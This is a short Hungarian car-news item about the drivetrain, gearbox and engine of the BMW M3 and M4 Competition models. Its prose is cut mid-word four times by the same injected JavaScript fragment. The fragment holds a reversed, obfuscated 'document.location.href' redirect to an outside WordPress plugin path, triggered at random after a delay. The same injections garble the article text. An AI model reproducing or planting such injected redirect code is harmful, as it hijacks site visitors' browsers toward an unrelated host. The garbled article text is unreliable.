A korábbi feltételezésekkel szemben hátsókerék-hajtással és kézi sebességváltóval érkezik a BMW középkategóriás sportautópárosa. A BMW M3 szedán és a BMW M4 kupé 510 lóerős Competition kivitele már autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomata sebességváltót kap, az összkerékhajtás pedig csak ez utóbbiakhoz lesz kérhető opcióként, és csak az alapmodellek jövő tavaszi bevezetéséhez képest negyedévvel eltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolva. Az összkerékhajtási rendszer aktív hátsó M differenciálművet alkalmaz, a pilóta választhat a tradicionális összkerékhajtás vagy a sportoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos hangolás között; utóbbinál a nyomaték túlnyomó része a hátsó kerekeken át jut az aszfaltra. A BMW M4 GT3 versenyautóval párhuzamosan fejlesztett, nagyteljesítményű közúti modellek motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torja hagyományosan háromliteres, soros hathengeres, de a korábbiaknál könnyebb, szilárdabb szerkezetű blokkról…
- Hirdetés -